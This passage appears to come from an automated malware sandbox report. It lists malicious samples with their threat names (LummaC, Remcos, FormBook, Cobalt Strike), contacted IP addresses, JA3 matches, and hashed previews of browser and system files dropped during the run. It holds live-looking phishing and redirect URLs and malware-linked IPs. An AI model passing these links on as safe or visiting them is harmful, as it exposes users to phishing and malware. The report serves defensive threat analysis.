                                                                                                                                                                                                                              https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 13.32.121.19
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 18.244.18.27
                                                                                                                                                                                                                              https://pzpvsr8w.r.us-west-2.awstrack.me/L0/https:%2F%2Flmmoya.online%2Fcave.html/1/010101933f26e1e0-1115fe0b-5025-44be-8af4-15d6df5c778e-000000/HfxdUzBUygbU0CHkcLEJKW7Wybk=401Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                                                                                              • 13.35.58.71
                                                                                                                                                                                                                              phish_alert_sp1_1.0.0.0(1).emlGet hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                              • 54.231.168.160
                                                                                                                                                                                                                              voi.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 3.69.129.77
                                                                                                                                                                                                                              https://securemail.clearswift.com/registration.html?rrRegcode=7MpnbN82&rrUserId=e5178bc1-efec-4a4c-a756-6d87cb45f84e&enterprise=DVLA&locale=en_US&msgUserId=6bc4168eeb627adaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 35.178.12.160
                                                                                                                                                                                                                              PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                              • 75.2.103.23
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 18.244.18.27
                                                                                                                                                                                                                              Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                              • 13.248.169.48
                                                                                                                                                                                                                              HUMBER-COLLEGECAOrder_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              MICROSOFT-CORP-MSN-AS-BLOCKUSFRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                              https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 150.171.27.10
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                                                                              https://pzpvsr8w.r.us-west-2.awstrack.me/L0/https:%2F%2Flmmoya.online%2Fcave.html/1/010101933f26e1e0-1115fe0b-5025-44be-8af4-15d6df5c778e-000000/HfxdUzBUygbU0CHkcLEJKW7Wybk=401Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                                                                              phish_alert_sp1_1.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 13.89.178.27
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                                                                              https://lnk.ie/7469O/e=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 23.101.59.196
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 94.245.104.56

                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0ez30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Order88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              https://www.google.co.th/url?q=sf_rand_string_uppercase(33)uQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%20xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%62%65%73%74%73%63%72%65%65%6E%69%6E%67%73%65%72%76%69%63%65%2E%63%6F%6D%2F%77%69%6E%6E%6D%2F%6B%6F%6C%69%6E%6E%2F%6B%6F%6F%6C%2Ftest@gmail.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/kovitz.net%2Fyvbw%2F9424537096/ZGViQG1hcnRpbmpveWNlLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              phish_alert_sp1_1.0.0.0(1).emlGet hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              voi.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              bPRQRIfbbq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              New Order Data sheet Page.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                              • 142.215.209.78

                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                                                              Entropy (8bit):0.8022127453368676
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUA5:RJE+Lfki1GjHwU/+vVhWqpw
                                                                                                                                                                                                                              MD5:E4A04B5946A47199A4681AD17A92409D
                                                                                                                                                                                                                              SHA1:554BF7F1DF91DF1564F2B922B1AE1261E6AFBD55
                                                                                                                                                                                                                              SHA-256:754C6D9DAFC9E9B17738E5E9F402FE0E3F9A978E07E167334B5D24F19C48EA82
                                                                                                                                                                                                                              SHA-512:FF883FD8876C831E6715C48F9B39C091ED6E971A7A7915640EA72EF41B9A4BFA585ABD5C886B9507F3D5E33375C4A6B0E5F5D7EA16DFA9F0E5904109BB6616C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa981a5e2, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1048576
                                                                                                                                                                                                                              Entropy (8bit):0.9433629491245563
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:rSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:razaHvxXy2V2UR
                                                                                                                                                                                                                              MD5:50E23E1AA143D05CB0EB38C2E51105E4
                                                                                                                                                                                                                              SHA1:486AFC41B86EE28EF1D1AF309FD94E0F8D48DB05
                                                                                                                                                                                                                              SHA-256:CC325FD84096B5413D0203CF4A1DEB3BF7188D0D27E26F1DD6E37710A461C08B
                                                                                                                                                                                                                              SHA-512:519B0990A9042509A846F9D4D57ED94BA7786AA936199727D011A0AE651702F9646DAFEC742FBAB74B6500E9AC21860EE0547472E145A18932307436178E2EEB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:....... ...............X\...;...{......................0.x...... ...{s.!5...|..h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{.....................................5!5...|....................i!5...|K..........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                              Entropy (8bit):0.08197730164060239
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:PmtlEYezmZutnVsl/nqlFcl1ZUlllllkFQButl/illGBnX/l/Tj/k7/t:PdzzuiVsl/qlFclQ/lEqBiQ254
                                                                                                                                                                                                                              MD5:9DA4B9A448A420FABA9013632EE32C01
                                                                                                                                                                                                                              SHA1:D9396594EA2BCFC2272E440B9B8CA20F538DB1B2
                                                                                                                                                                                                                              SHA-256:E30C733B401E77B3A10340DA58D06112BCF69D781AF8A4924B412D119AB9EA5A
                                                                                                                                                                                                                              SHA-512:1F1779F15C85DB148C23F12DBE6978357C1CFA4B31B9BF5AB032687625DA5EA3802DA1E41CB64959B639E41335C0744D963351489FDEB0ECA3746D6552FD3FB4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:r.c......................................;...{..!5...|K.. ...{s.......... ...{s.. ...{s.P.... ...{s...................i!5...|K.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4ea9b46a-be84-4110-b2d1-978b77ab2e9c.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):48958
                                                                                                                                                                                                                              Entropy (8bit):6.090810299330451
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:/DXzgWPsj/qlGJqIY8GB4xXrf7LmZjQN/jfgrl8tu+CNKwWE7RTupzKscDX//NPX://Ps+wsI7yOXrAMjsl8UKoRTuiVIoV
                                                                                                                                                                                                                              MD5:2CC0A3EE03E31BAEFECD09AE20C0B2B8
                                                                                                                                                                                                                              SHA1:F31D156AEC34821F7C177643BBA043C2DF8F9539
                                                                                                                                                                                                                              SHA-256:97A8AF73CC22EEFBBCFD7F2D91171EB7363E5C03D65F85E0BA354A04E55B87D8
                                                                                                                                                                                                                              SHA-512:56002FA365D908C4A2273EC16EFCADB8B8CAD9ADEE239C15A2A7178F934E189C565B70C18E8CB9C213799C580382B2E148058339D828C1D36C7DB762FEEEDE1F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"a8a35dbf-942c-43f8-aa14-0bef12ec9514"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6fb5f5d2-374f-48ee-b9a5-9453224dfa14.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44711
                                                                                                                                                                                                                              Entropy (8bit):6.096278049343526
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xh9uLmZjQN/jfZbhfIMPFMPKwWE7RTupzKscDX//NPm:z/Ps+wsI7yOhnMjiKoRTuiVIos
                                                                                                                                                                                                                              MD5:35D36DC0AC002972494BF494C0AAFCDB
                                                                                                                                                                                                                              SHA1:82EDFECF2662BD3B131BD6391F60242EB04E4C93
                                                                                                                                                                                                                              SHA-256:60FD9B64FF915EBA4FE8601F0CF94016244385A5FF520019B2B384D2DE2A241A
                                                                                                                                                                                                                              SHA-512:D9C3FE6B03CCDFA41C5C0FE19C063B7743E2138E966EF27F5955D9403A86EC9CE4EDA4B40A2FA60C78F8A9A1BB041B4388FDC57A427FB892E6AF5212288F0AA9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\71325b03-c396-4e12-8060-5305f5fa045c.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):48958
                                                                                                                                                                                                                              Entropy (8bit):6.090810299330451
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:/DXzgWPsj/qlGJqIY8GB4xXrf7LmZjQN/jfgrl8tu+CNKwWE7RTupzKscDX//NPX://Ps+wsI7yOXrAMjsl8UKoRTuiVIoV
                                                                                                                                                                                                                              MD5:2CC0A3EE03E31BAEFECD09AE20C0B2B8
                                                                                                                                                                                                                              SHA1:F31D156AEC34821F7C177643BBA043C2DF8F9539
                                                                                                                                                                                                                              SHA-256:97A8AF73CC22EEFBBCFD7F2D91171EB7363E5C03D65F85E0BA354A04E55B87D8
                                                                                                                                                                                                                              SHA-512:56002FA365D908C4A2273EC16EFCADB8B8CAD9ADEE239C15A2A7178F934E189C565B70C18E8CB9C213799C580382B2E148058339D828C1D36C7DB762FEEEDE1F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"a8a35dbf-942c-43f8-aa14-0bef12ec9514"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-673B62FE-1E10.pma

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                              Entropy (8bit):0.4145080971859856
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:LBd0/16EC0Wt+F13N9HsHvVV4YyTEUA4Pg1HFOXBWoqi:ld0LfF13XHsHcWUA4PaHGBbqi
                                                                                                                                                                                                                              MD5:834CC643CB6903E79C3DFB236AB08C70
                                                                                                                                                                                                                              SHA1:74441BF91C605128BAE682651094CD933A5F964D
                                                                                                                                                                                                                              SHA-256:4BCE276D9263D85D986C4C85D571CEDE92351EE90FEB575BE82254099DB0649D
                                                                                                                                                                                                                              SHA-512:653C5F7E581AA0EC8059D0C2FB292AF95E14CFC6209C2CF0C81FCB02D71C2128A631FADCE016AA477E9661818949846E95361B9077BF60E38A5CBB97C7821E38
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:...@..@...@.....C.].....@...............`[...K..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452....x86_64..?.......".npukoh20,1(.0..8..B....(.....10.0.19041.5462.Google Inc. (Google):bANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver-5.0.0)M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....s..^o..J...W..^o..J.....1.^o..J.......^o..J../T...^o..J.....p.^o..J..~|[..^o..J...t...^o..J.......^o..J...Y...^o..J.......^o..J..w....^o..J...G.Y.^o..J..h....^o..J..A....^o..J..1H...^o..J....c..^o..J...c=..^o..J....J..^o..J...h8..^o..J..3.(..^o..J.......^o..J.......^o..J.....-.^o..J.....z.^o..J..G....^o..J..8...^o..J...#...^o..J.....a.^o..J....r..^o..J....k..^o..J..K...^o..J..

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):280
                                                                                                                                                                                                                              Entropy (8bit):4.195531555605597
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:FiWWltlMpKoKuNoDZbkDURSHxig5ABVP/Sh/JzvNKIUBUhX9USWXQPptll:o1GVKCoD4Hxi2ABVsJDZYeulX+
                                                                                                                                                                                                                              MD5:6F31F66D322746DFA960845F4C4E8A15
                                                                                                                                                                                                                              SHA1:22CC9EAF87C966CAFF2E6C568C1D31FBBF9ABE8D
                                                                                                                                                                                                                              SHA-256:DE611AF9189D0C1CC631F9406C71D9950AC6EDA7B4EC10456D68BF55A0B54B25
                                                                                                                                                                                                                              SHA-512:C56CD43A06DAFDED388055B6B1EEB3F2F739414D6D383AEFB6B63B4B119B7AAC60C7487DC6031260FB1E116AD2AB2A8A3569CC9CBD88EE7E2A1F46F2851FE2C0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:sdPC.........................TJ.[Y....."h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................ecadf109-1d88-4bd2-8ebf-85346832b43e............

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\84a6ae2b-c771-4456-823d-f723b4414b67.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\95de54a8-066e-4b85-9490-26099d0279fc.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10346
                                                                                                                                                                                                                              Entropy (8bit):5.1341367806862195
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:stQkmw5sBQcsCRIa34Hko4h8MbV+FItQA4kq7NITbUNKJ:stQKsBQcnRXfbGcQxX7NIb
                                                                                                                                                                                                                              MD5:27EADB3399C6406701850B36879AF39A
                                                                                                                                                                                                                              SHA1:EC044A4215EBABB53C08BC01AF0064E9EE4EDC75
                                                                                                                                                                                                                              SHA-256:8FECB9634AFE1AF8BFC10930192790C24138C0521D8094F8CBB9CE68CCE4EDC1
                                                                                                                                                                                                                              SHA-512:81890FD516DB6DF649004B9F06C382F81BB700F966DE4213FA2C12E47328B67A06053BB473FECE828C7D348FD845A7F456A16D7B769F08BBD3C85880A8190857
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376418816206161","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_normal_window_close":"13376418824310325","toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":-1436,"left":-2400,"maximized":false,"right":-1350,"top":-2400,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":885,"browser_content_container_width":1006,"browser_content_container_x":0,"browser_content_container_y":79,"continuous_migration":{"ci_correction_for_holdout_tre

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:MANIFEST-000001.

